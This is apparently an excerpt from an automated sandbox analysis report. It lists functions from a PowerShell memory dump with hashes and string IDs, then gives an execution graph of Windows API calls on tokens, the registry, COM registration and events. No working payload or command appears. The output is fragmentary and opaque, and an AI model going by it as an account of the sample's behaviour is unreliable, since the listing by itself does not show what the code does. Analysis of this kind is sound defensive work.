                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-3272787073
                                                                                                                                • Opcode ID: d428945403abe10c72cd8657c1bd576925579cc042a8e3a09ba065e19069c30f
                                                                                                                                • Instruction ID: 6ffc5be575374c34ad8342ecf141eb0619b4753b4c5cb3181e9bdf18890a9b2c
                                                                                                                                • Opcode Fuzzy Hash: d428945403abe10c72cd8657c1bd576925579cc042a8e3a09ba065e19069c30f
                                                                                                                                • Instruction Fuzzy Hash: D5413BB5B0120ADFCB294E69844C366FBE1BF85320F28986BD8558F2D4DF35E845C791
                                                                                                                                Function 07D048D5 Relevance: 6.4, Strings: 5, Instructions: 109COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-3272787073
                                                                                                                                • Opcode ID: 9733fe77942e15aa06d04f85778c59cdcd0503f0430983291da0b35c4c31fd92
                                                                                                                                • Instruction ID: 657f05c6ffcf34a4aa3c08997e4556b75fc63425a54551f0057590e655c610e9
                                                                                                                                • Opcode Fuzzy Hash: 9733fe77942e15aa06d04f85778c59cdcd0503f0430983291da0b35c4c31fd92
                                                                                                                                • Instruction Fuzzy Hash: 19316EB6B04286CFCB294E29A414F76F7A1AFC3211B24A87EC6518B2D5DF32C455C7D1
                                                                                                                                Function 07D0C796 Relevance: 6.3, Strings: 5, Instructions: 85COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$d%dq$d%dq$d%dq$tP^q
                                                                                                                                • API String ID: 0-3846404929
                                                                                                                                • Opcode ID: e21ee32a015de6df12343564b07885eb7a12d81202fa4dbfaa152ab1f7285e98
                                                                                                                                • Instruction ID: 07487a0ead088cef5a0f7f825eccc117deec71270ce629771a2530b6179a4546
                                                                                                                                • Opcode Fuzzy Hash: e21ee32a015de6df12343564b07885eb7a12d81202fa4dbfaa152ab1f7285e98
                                                                                                                                • Instruction Fuzzy Hash: 2A318FB1B102159FCB28DF65C444BAEFBA2FB48714F249659E909AB390C631DC41CBE4
                                                                                                                                Function 07D0BF00 Relevance: 5.5, Strings: 4, Instructions: 487COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (o^q$(o^q$(o^q$(o^q
                                                                                                                                • API String ID: 0-1978863864
                                                                                                                                • Opcode ID: e906f0b39d3493e2d4f6c66582fb8920d6df9e1a49e3c90a976a66b0f25eb5ad
                                                                                                                                • Instruction ID: 01fcf1247058e1397de1c3afe62dca8e6cc9fdf2aeb5530cc9ebbb05c213db6f
                                                                                                                                • Opcode Fuzzy Hash: e906f0b39d3493e2d4f6c66582fb8920d6df9e1a49e3c90a976a66b0f25eb5ad
                                                                                                                                • Instruction Fuzzy Hash: C9F114B17142069FCB248F68D8047EABBA2FF82310F14966AE5098B6D1DB36D855C7F1
                                                                                                                                Function 07D0DEC8 Relevance: 5.4, Strings: 4, Instructions: 374COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                • API String ID: 0-1420252700
                                                                                                                                • Opcode ID: 5e5595fc0f1b0b9f7260693017275084cc5a08a2b647b0fa1b84cdc9d2d96eaa
                                                                                                                                • Instruction ID: 3098559d88a676d4e4616d4964816f5ddbe1d711a51c6ac6deeb655766449078
                                                                                                                                • Opcode Fuzzy Hash: 5e5595fc0f1b0b9f7260693017275084cc5a08a2b647b0fa1b84cdc9d2d96eaa
                                                                                                                                • Instruction Fuzzy Hash: 50E1B3B0B002059FDB24EB64C951B6EFBB3AF85708F149869D5016FB94DB31EC468BE1
                                                                                                                                Function 07D09948 Relevance: 5.2, Strings: 4, Instructions: 200COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$]$$^q
                                                                                                                                • API String ID: 0-2262204542
                                                                                                                                • Opcode ID: e68dc959c8e218ad32f8d40300ec8c4d93b995342ce8ec54d41dba628cbb5443
                                                                                                                                • Instruction ID: 456ba86f9d37b5180764b11a590726516ceccc9cc602d313e76f5fbb2a093f6c
                                                                                                                                • Opcode Fuzzy Hash: e68dc959c8e218ad32f8d40300ec8c4d93b995342ce8ec54d41dba628cbb5443
                                                                                                                                • Instruction Fuzzy Hash: DB516AB1B043059FCB249A699921767FFB59FC6314F14A07AD485CB2D3DA31E891C3E1
                                                                                                                                Function 07D04408 Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ]$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-2184375889
                                                                                                                                • Opcode ID: 603cb80e18bcda1e1cc8655715e2cd555a50a7b4e49855905a0ee61075fa7a4d
                                                                                                                                • Instruction ID: 72c2e78832e75a6aa4764d99f896dd8ff31185e3784a03e8129b870191cddae0
                                                                                                                                • Opcode Fuzzy Hash: 603cb80e18bcda1e1cc8655715e2cd555a50a7b4e49855905a0ee61075fa7a4d
                                                                                                                                • Instruction Fuzzy Hash: 1E5149F5B043869FCB348A699804B6BFBE6AFC3611F24946BDA45CF281DA31C845C7D1
                                                                                                                                Function 07D0D968 Relevance: 5.1, Strings: 4, Instructions: 115COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: XRcq$XRcq$tP^q$$^q
                                                                                                                                • API String ID: 0-3596674671
                                                                                                                                • Opcode ID: 8c778b529dea677fa7bbf24fc2b081a1c36ada7f4693c5ff3f23e0fd42637017
                                                                                                                                • Instruction ID: bc74367eb08b54c6bf4388e9914cf6e4e918347a4a9146b6965de00c2814f02a
                                                                                                                                • Opcode Fuzzy Hash: 8c778b529dea677fa7bbf24fc2b081a1c36ada7f4693c5ff3f23e0fd42637017
                                                                                                                                • Instruction Fuzzy Hash: E14170B1B04205DBCB24CE99C144BAAFBF3AB89710F69E19AE8046B3D5C771D941CBD0
                                                                                                                                Function 07D00DF0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                                                • API String ID: 0-2125118731
                                                                                                                                • Opcode ID: e5aed210308531d8d2cd73ebf5b2b39076862ee6b63760f85c388a15e023ddac
                                                                                                                                • Instruction ID: 0d09d9ae2dc7a6fba0984d70c018f740ebab70513392bcfa23c365656157567c
                                                                                                                                • Opcode Fuzzy Hash: e5aed210308531d8d2cd73ebf5b2b39076862ee6b63760f85c388a15e023ddac
                                                                                                                                • Instruction Fuzzy Hash: 9C2177B270030EBBDB28457A9C04B27E7D69BC0715F24982AA445EB3C5DE36C88183A0
                                                                                                                                Function 07D00321 Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.2052254365.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_7d00000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                • API String ID: 0-2049395529
                                                                                                                                • Opcode ID: e7ddbc2001f009c8fd670c26cf12f62072fb26eb47f780b177a2e48132df496a
                                                                                                                                • Instruction ID: 085bf2a8566b27ed48e2ed1c4f0e0c7747e006e73f2e69783b3b02090e27f16f
                                                                                                                                • Opcode Fuzzy Hash: e7ddbc2001f009c8fd670c26cf12f62072fb26eb47f780b177a2e48132df496a
                                                                                                                                • Instruction Fuzzy Hash: 1BF05CB0B0021BBBCA3D155D152032AD6E76BC0E19B25952FC441AF3CCCE21CC8643CB

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:8.8%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:34.4%
                                                                                                                                Total number of Nodes:997
                                                                                                                                Total number of Limit Nodes:22
                                                                                                                                execution_graph 3383 1fa116 3384 1fa0c9 3383->3384 3384->3383 3385 1f915b 9 API calls 3384->3385 3385->3384 3386 1f9c10 SetUnhandledExceptionFilter 3387 1f8d10 3388 1f8bfd 16 API calls 3387->3388 3389 1f8d24 3388->3389 3390 1f3a90 3391 1f3ab6 3390->3391 3395 1f3aac 3390->3395 3392 1f3b31 WaitForSingleObject 3391->3392 3393 1f3b46 3391->3393 3391->3395 3392->3393 3392->3395 3393->3395 3396 1f5bf0 GetModuleHandleExW 3393->3396 3397 1f5c10 GetProcAddress 3396->3397 3400 1f5c48 3396->3400 3398 1f5c3f FreeLibrary 3397->3398 3399 1f5c24 3397->3399 3398->3400 3399->3398 3401 1f5c32 FreeLibrary 3399->3401 3400->3395 3401->3400 3405 1f7d89 3406 1f7d9f 3405->3406 3407 1f7da7 3405->3407 3409 1f637a 3406->3409 3410 1f6380 3409->3410 3412 1f6391 3409->3412 3411 1f6395 UnhandledExceptionFilter 3410->3411 3410->3412 3411->3407 3412->3407 3413 1f5f04 3414 1f5f19 3413->3414 3415 1f5f56 3414->3415 3416 1f5f45 memcpy 3414->3416 3416->3415 3420 1f4f00 3421 1f4f28 3420->3421 3422 1f4f91 3420->3422 3424 1f878a 2 API calls 3421->3424 3423 1f878a 2 API calls 3422->3423 3425 1f4fa9 3423->3425 3430 1f4f43 3424->3430 3435 1f4f47 3425->3435 3439 1f4ebd lstrlenW 3425->3439 3428 1f87d4 GlobalFree 3431 1f500c 3428->3431 3429 1f4fe3 3449 1f4cec 3429->3449 3433 1f87d4 GlobalFree 3430->3433 3430->3435 3434 1f95e0 4 API calls 3431->3434 3433->3422 3436 1f501c 3434->3436 3435->3428 3437 1f4fbd 3437->3435 3441 1f4b06 3437->3441 3440 1f4ece 3439->3440 3440->3429 3440->3437 3443 1f4b2b 3441->3443 3442 1f4b8f 3446 1f4bbb 3442->3446 3470 1f57c0 3442->3470 3443->3442 3466 1f56b2 3443->3466 3447 1f95e0 4 API calls 3446->3447 3448 1f4bd2 3447->3448 3448->3435 3450 1f4d2e 3449->3450 3451 1f4d48 lstrlenW lstrlenW lstrlenW lstrlenW 3450->3451 3452 1f4df3 lstrlenW lstrlenW 3450->3452 3453 1f86d5 2 API calls 3451->3453 3454 1f86d5 2 API calls 3452->3454 3455 1f4d9a 3453->3455 3454->3455 3460 1f4e7a 3455->3460 3462 1f4d9e 3455->3462 3493 1f3e90 3455->3493 3456 1f86b2 GlobalFree 3457 1f4de2 3456->3457 3458 1f95e0 4 API calls 3457->3458 3459 1f4df1 3458->3459 3459->3435 3460->3462 3463 1f56b2 WideCharToMultiByte 3460->3463 3462->3456 3464 1f4ea4 3463->3464 3465 1f57c0 12 API calls 3464->3465 3465->3462 3467 1f56e9 3466->3467 3469 1f56cb 3466->3469 3467->3442 3468 1f579a WideCharToMultiByte 3468->3467 3469->3467 3469->3468 3471 1f57e5 LoadLibraryExW 3470->3471 3472 1f597c 3471->3472 3473 1f5806 GetProcAddress 3471->3473 3474 1f95e0 4 API calls 3472->3474 3475 1f5975 FreeLibrary 3473->3475 3477 1f581c 3473->3477 3476 1f5989 3474->3476 3475->3472 3476->3446 3478 1f585c GetSystemDefaultLangID 3477->3478 3488 1f5912 3477->3488 3479 1f588f memset FormatMessageW 3478->3479 3480 1f5873 3478->3480 3481 1f58cf 3479->3481 3482 1f591b 3479->3482 3480->3479 3480->3488 3483 1f598b 3481->3483 3484 1f58e1 WideCharToMultiByte 3481->3484 3489 1f2dd2 3482->3489 3486 1f9728 4 API calls 3483->3486 3484->3488 3487 1f5990 3486->3487 3488->3475 3490 1f2de1 3489->3490 3491 1f2df1 _vsnprintf 3490->3491 3492 1f2e11 3490->3492 3491->3492 3492->3488 3496 1f3ea6 3493->3496 3497 1f3f24 3493->3497 3494 1f3eff lstrlenW lstrlenW 3495 1f87f5 2 API calls 3494->3495 3495->3497 3496->3494 3496->3497 3497->3460 3501 1f9280 3502 1f9285 3501->3502 3510 1f9c98 GetModuleHandleW 3502->3510 3504 1f9291 __set_app_type __p__fmode __p__commode 3505 1f92c9 3504->3505 3506 1f92de 3505->3506 3507 1f92d2 __setusermatherr 3505->3507 3512 1f9ecd _controlfp 3506->3512 3507->3506 3509 1f92e3 3511 1f9ca9 3510->3511 3511->3504 3512->3509 3513 1f8980 3516 1f88b4 3513->3516 3517 1f88d2 3516->3517 3520 1f88e6 3516->3520 3518 1f88d4 Sleep 3517->3518 3518->3518 3518->3520 3519 1f891d GetProcAddress 3522 1f892b 3519->3522 3521 1f908c 14 API calls 3520->3521 3523 1f8905 3520->3523 3521->3523 3523->3519 3523->3522 3524 1fa0bf 3525 1fa0c9 3524->3525 3526 1f915b 9 API calls 3525->3526 3526->3525 3527 1f94bf _XcptFilter 3531 1f7db7 3532 1f7dba 3531->3532 3533 1f8f5a 2 API calls 3532->3533 3534 1f7dc6 ExitProcess 3533->3534 2822 1f9330 2839 1f9e35 2822->2839 2824 1f9335 2825 1f9346 GetStartupInfoW 2824->2825 2826 1f9363 2825->2826 2827 1f9378 2826->2827 2828 1f937f Sleep 2826->2828 2829 1f9397 _amsg_exit 2827->2829 2831 1f93a1 2827->2831 2828->2826 2829->2831 2830 1f93e3 _initterm 2832 1f93fe __IsNonwritableInCurrentImage 2830->2832 2831->2830 2831->2832 2838 1f93c4 2831->2838 2833 1f94a6 _ismbblead 2832->2833 2835 1f94ee 2832->2835 2836 1f948e exit 2832->2836 2844 1f7d41 2832->2844 2833->2832 2837 1f94f7 _cexit 2835->2837 2835->2838 2836->2832 2837->2838 2840 1f9e5e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 2839->2840 2841 1f9e5a 2839->2841 2843 1f9ead 2840->2843 2841->2840 2842 1f9ec2 2841->2842 2842->2824 2843->2842 2845 1f7d4d 2844->2845 2855 1f7d1b SetProcessMitigationPolicy 2845->2855 2847 1f7d64 2856 1f8b80 2847->2856 2859 1f8adc 2847->2859 2848 1f7d7c 2867 1f63e3 2848->2867 2855->2847 2857 1f8adc 3 API calls 2856->2857 2858 1f8b8f 2857->2858 2858->2848 2860 1f8aee 2859->2860 2861 1f8af8 2860->2861 2862 1f8ae6 Sleep 2860->2862 2863 1f8b1f 2861->2863 2864 1f8b0b LoadLibraryW 2861->2864 2865 1f8b28 GetProcAddress 2861->2865 2862->2860 2863->2865 2866 1f8b3d 2863->2866 2864->2863 2864->2865 2865->2866 2866->2848 3068 1fa1f0 2867->3068 2870 1f6474 GetCommandLineW 2876 1f64b6 GetStdHandle 2870->2876 2871 1f6440 GetCurrentProcess NtQueryInformationProcess 2871->2870 2872 1f6467 2871->2872 2872->2870 2874 1f650f 2877 1f6515 memset memset 2874->2877 2875 1f6503 GetFileType 2875->2874 2875->2877 2876->2874 2876->2875 2878 1f6558 2877->2878 2879 1f66be 2878->2879 2882 1f65a0 2878->2882 2880 1f66d6 2879->2880 2917 1f66ed 2879->2917 2881 1f8665 2 API calls 2880->2881 2897 1f66e9 2881->2897 2883 1f6f7f 2882->2883 3117 1f2f5e 2882->3117 2885 1f43a0 26 API calls 2883->2885 2885->2917 2888 1f65f4 2891 1f65ff RegQueryValueExW 2888->2891 2888->2917 2893 1f662d 2891->2893 2894 1f667a RegCloseKey 2891->2894 3120 1f8665 2893->3120 2894->2917 2949 1f668c 2894->2949 2895 1f7d17 3065 1f8f5a 2895->3065 2902 1f68b7 CompareStringW 2897->2902 2903 1f68e3 CompareStringW 2897->2903 2913 1f691b 2897->2913 2897->2917 2899 1f6645 RegCloseKey 2899->2917 2900 1f6654 RegQueryValueExW 2900->2894 2901 1f6f92 2905 1f6e57 2901->2905 2912 1f6fa3 2901->2912 2902->2897 2902->2913 2903->2897 2903->2913 2904 1f6b1e memset 3129 1f612f 2904->3129 3070 1f63a0 GetVersion 2905->3070 2909 1f69ae CompareStringW 2909->2913 2910 1f6e50 2916 1f43a0 26 API calls 2910->2916 2911 1f6f38 2915 1f43a0 26 API calls 2911->2915 2918 1f63a0 3 API calls 2912->2918 2946 1f6fc0 2912->2946 2913->2909 2913->2917 2922 1f6a7c 2913->2922 2923 1f6a57 2913->2923 3125 1f42fe 2913->3125 2920 1f6f3f 2915->2920 2916->2905 3106 1f86b2 2917->3106 2918->2946 2920->2905 2925 1f6f65 GlobalFree 2920->2925 2922->2917 2923->2917 2923->2949 2924 1f70d7 CoInitialize 3171 1f908c memset 2924->3171 2925->2905 2927 1f6ba3 GlobalFree 2927->2949 2928 1f6e7e 2928->2917 2928->2924 2937 1f6ead 2928->2937 2929 1f7127 2931 1f7ca3 GetMessageW 2929->2931 2932 1f7141 GetPEB 2929->2932 2930 1f6c64 lstrlenW 3140 1f878a 2930->3140 2934 1f7cc8 TranslateMessage DispatchMessageW 2931->2934 2935 1f7cb8 2931->2935 2956 1f7167 2932->2956 2934->2931 2935->2934 2939 1f7c4a 2935->2939 2936 1f70fc CoRegisterClassObject 2936->2929 2936->2937 2937->2929 2937->2932 2937->2936 2938 1f7094 3145 1f5c84 memset 2938->3145 2940 1f7c6a CoUninitialize 2939->2940 2944 1f7c63 CoRevokeClassObject 2939->2944 2940->2917 2942 1f7c7a 2940->2942 2945 1f5c84 20 API calls 2942->2945 2944->2940 2945->2922 2946->2917 2946->2928 2946->2938 2947 1f59f2 18 API calls 2947->2917 2948 1f7212 2950 1f7217 GetCurrentThread OpenThreadToken 2948->2950 2949->2883 2949->2901 2949->2904 2949->2905 2949->2910 2949->2911 2949->2917 2949->2927 2949->2930 3137 1f4725 lstrlenW 2949->3137 2951 1f72eb 2950->2951 2952 1f723a GetLastError 2950->2952 2953 1f72f8 RegCloseKey RegEnumKeyW 2951->2953 2954 1f72f2 RevertToSelf 2951->2954 2952->2951 2955 1f71cd 2952->2955 2957 1f731b GetCurrentProcess OpenProcessToken 2953->2957 2958 1f7315 RevertToSelf 2953->2958 2954->2953 2955->2947 2956->2948 2956->2950 2956->2955 2959 1f72a2 OpenEventW 2956->2959 2960 1f73cb GetLastError memset 2957->2960 2961 1f7346 2957->2961 2958->2957 2962 1f72bc 2959->2962 2963 1f7c88 GetLastError 2959->2963 3189 1f2e35 2960->3189 3178 1f30f2 2961->3178 2962->2963 2966 1f72c5 WaitForSingleObject CloseHandle 2962->2966 2963->2955 2966->2950 2968 1f72df 2966->2968 2968->2955 2969 1f738c CloseHandle 2973 1f7401 2969->2973 2970 1f7353 GetTokenInformation 2970->2969 2971 1f7377 EqualSid 2970->2971 2971->2969 2973->2968 2974 1f744b 2973->2974 3193 1f31a9 2974->3193 2977 1f74d4 3300 1f8620 2977->3300 2978 1f74b2 2979 1f74b9 CloseHandle 2978->2979 2980 1f74c3 2978->2980 2979->2980 3278 1f59f2 GetLastError 2980->3278 2984 1f8620 2 API calls 2985 1f750c 2984->2985 2986 1f8620 2 API calls 2985->2986 2987 1f751c 2986->2987 2988 1f8620 2 API calls 2987->2988 2989 1f752c 2988->2989 2990 1f8620 2 API calls 2989->2990 2991 1f753c MakeAbsoluteSD 2990->2991 2992 1f75b8 2991->2992 2993 1f7593 GetLastError 2991->2993 2997 1f75fe CreateEventW 2992->2997 2998 1f75e2 2992->2998 2994 1f75ac 2993->2994 2995 1f75a2 CloseHandle 2993->2995 2996 1f59f2 18 API calls 2994->2996 2995->2994 3027 1f7665 2996->3027 3001 1f7628 CreateEventW 2997->3001 3002 1f7611 2997->3002 2998->2994 3000 1f75e8 CloseHandle 2998->3000 2999 1f7af3 3004 1f7b13 2999->3004 3009 1f7b06 GlobalFree 2999->3009 3000->2994 3007 1f766a 3001->3007 3008 1f763a 3001->3008 3005 1f7617 CloseHandle 3002->3005 3006 1f7621 GetLastError 3002->3006 3003 1f7ae6 GlobalFree 3003->2999 3010 1f7b33 3004->3010 3014 1f7b26 GlobalFree 3004->3014 3005->3006 3006->2994 3304 1f62a8 3007->3304 3008->3006 3012 1f7640 CloseHandle 3008->3012 3009->3004 3015 1f7b53 3010->3015 3017 1f7b46 GlobalFree 3010->3017 3012->3006 3014->3010 3015->2917 3020 1f7b6e GlobalFree 3015->3020 3017->3015 3018 1f768a 3021 1f7691 CloseHandle 3018->3021 3038 1f769b 3018->3038 3019 1f76a5 3313 1f3dfa 3019->3313 3020->2917 3021->3038 3024 1f76bc 3025 1f76c3 CloseHandle 3024->3025 3024->3038 3025->3038 3026 1f59f2 18 API calls 3026->3027 3027->2999 3027->3003 3028 1f76d7 3029 1f7773 3028->3029 3030 1f7792 OpenProcess 3028->3030 3033 1f777a CloseHandle 3029->3033 3029->3038 3031 1f77cf 3030->3031 3032 1f77aa 3030->3032 3036 1f77e7 3031->3036 3039 1f7802 3031->3039 3034 1f77bb GetLastError 3032->3034 3035 1f77b1 CloseHandle 3032->3035 3033->3038 3034->3038 3035->3034 3037 1f77ee CloseHandle 3036->3037 3036->3038 3037->3038 3038->3026 3040 1f78ca CloseHandle 3039->3040 3041 1f78d9 3039->3041 3040->3041 3041->3038 3048 1f793f 3041->3048 3042 1f7a79 MsgWaitForMultipleObjects 3043 1f7a99 CloseHandle 3042->3043 3042->3048 3051 1f7bca 3043->3051 3052 1f7bb3 3043->3052 3044 1f7b80 CloseHandle 3044->3043 3045 1f79d2 CloseHandle 3045->3048 3046 1f7a56 PeekMessageW 3046->3048 3048->3042 3048->3043 3048->3044 3048->3045 3048->3046 3049 1f79ff OpenProcess 3048->3049 3050 1f7a3a TranslateMessage DispatchMessageW 3048->3050 3049->3048 3053 1f7aa6 3049->3053 3050->3046 3055 1f7bea 3051->3055 3059 1f7bdd GlobalFree 3051->3059 3052->3051 3054 1f7bbd GlobalFree 3052->3054 3057 1f7aad CloseHandle 3053->3057 3058 1f7ab7 GetLastError 3053->3058 3054->3051 3056 1f7c0a 3055->3056 3060 1f7bfd GlobalFree 3055->3060 3061 1f7c2a 3056->3061 3063 1f7c1d GlobalFree 3056->3063 3057->3058 3062 1f59f2 18 API calls 3058->3062 3059->3055 3060->3056 3061->2939 3064 1f7c3d GlobalFree 3061->3064 3062->3027 3063->3061 3064->2939 3377 1f8eca 3065->3377 3069 1f63f5 GetVersionExW 3068->3069 3069->2870 3069->2871 3071 1f63aa 3070->3071 3072 1f63e2 3070->3072 3071->3072 3073 1f63ae GetModuleHandleW 3071->3073 3072->2928 3076 1f43a0 3072->3076 3073->3072 3074 1f63bd GetProcAddress 3073->3074 3075 1f63d0 3074->3075 3075->3072 3077 1f43af 3076->3077 3078 1f878a 2 API calls 3077->3078 3079 1f43e8 3078->3079 3080 1f45aa 3079->3080 3082 1f878a 2 API calls 3079->3082 3081 1f87d4 GlobalFree 3080->3081 3083 1f45b5 3081->3083 3084 1f43fd 3082->3084 3085 1f87d4 GlobalFree 3083->3085 3084->3080 3087 1f878a 2 API calls 3084->3087 3086 1f45c0 3085->3086 3086->2928 3088 1f4442 3087->3088 3089 1f444a GetModuleFileNameW 3088->3089 3097 1f4596 3088->3097 3090 1f4465 3089->3090 3089->3097 3317 1f8c90 3090->3317 3091 1f87d4 GlobalFree 3091->3080 3093 1f44dd GlobalAlloc 3094 1f44f6 3093->3094 3095 1f450e GlobalFree 3094->3095 3096 1f451b 3094->3096 3103 1f4588 3094->3103 3095->3096 3322 1f8cd0 3096->3322 3097->3091 3098 1f4590 GlobalFree 3098->3097 3099 1f2e35 _vsnwprintf 3100 1f45f9 3099->3100 3102 1f2e35 _vsnwprintf 3100->3102 3100->3103 3102->3103 3103->3097 3103->3098 3107 1f7cf8 3106->3107 3108 1f86c2 GlobalFree 3106->3108 3109 1f87d4 3107->3109 3108->3107 3110 1f87df GlobalFree 3109->3110 3111 1f7d04 3109->3111 3110->3111 3112 1f95e0 3111->3112 3113 1f95eb 3112->3113 3114 1f95e8 3112->3114 3337 1f95f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3113->3337 3114->2895 3116 1f9726 3116->2895 3118 1f2f7f RegOpenKeyExW 3117->3118 3119 1f2f71 3117->3119 3118->2888 3119->3118 3121 1f868a 3120->3121 3122 1f867a GlobalAlloc 3120->3122 3123 1f6641 3121->3123 3124 1f869c GlobalFree 3121->3124 3122->3121 3123->2899 3123->2900 3124->3123 3127 1f431c 3125->3127 3126 1f4349 3126->2913 3127->3126 3338 1f87f5 3127->3338 3130 1f614e IsCharAlphaNumericW 3129->3130 3131 1f615d 3129->3131 3130->3131 3136 1f626e 3130->3136 3132 1f6275 3131->3132 3133 1f6262 3131->3133 3131->3136 3132->3136 3343 1f8865 3132->3343 3134 1f59f2 18 API calls 3133->3134 3134->3136 3136->2949 3349 1f86d5 3137->3349 3139 1f474b 3139->2949 3141 1f879c GlobalAlloc 3140->3141 3142 1f87ac 3140->3142 3141->3142 3143 1f87b3 3142->3143 3144 1f87be GlobalFree 3142->3144 3143->2949 3144->3143 3146 1f5ce3 GetACP LoadLibraryW 3145->3146 3147 1f5cc3 3145->3147 3148 1f5d4c FormatMessageW 3146->3148 3149 1f5cfc GetProcAddress 3146->3149 3147->3146 3160 1f5d88 3147->3160 3150 1f5d76 3148->3150 3151 1f5d94 3148->3151 3152 1f5d45 FreeLibrary 3149->3152 3153 1f5d12 GetLocaleInfoW 3149->3153 3154 1f5ee4 3150->3154 3150->3160 3155 1f2e35 _vsnwprintf 3151->3155 3152->3148 3153->3152 3167 1f5d42 3153->3167 3354 1f9728 3154->3354 3155->3160 3157 1f5e86 3158 1f5e84 3157->3158 3163 1f5e8f lstrlenW WriteFile WriteFile 3157->3163 3164 1f95e0 4 API calls 3158->3164 3160->3157 3160->3158 3161 1f5dd5 memset GetVersionExW 3160->3161 3165 1f5e28 3161->3165 3166 1f5e11 3161->3166 3163->3158 3168 1f5ee2 3164->3168 3170 1f87d4 GlobalFree 3165->3170 3166->3165 3169 1f878a 2 API calls 3166->3169 3167->3152 3168->2928 3169->3165 3170->3158 3358 1f9002 3171->3358 3174 1f90cc LoadLibraryW 3175 1f90db 3174->3175 3176 1f95e0 4 API calls 3175->3176 3177 1f90e7 3176->3177 3177->2937 3179 1f3120 AllocateAndInitializeSid 3178->3179 3187 1f3164 3178->3187 3180 1f313d GetLastError 3179->3180 3181 1f3145 GetLengthSid 3179->3181 3180->3187 3183 1f316b GetLengthSid memcpy 3181->3183 3184 1f3155 3181->3184 3182 1f95e0 4 API calls 3185 1f31a7 3182->3185 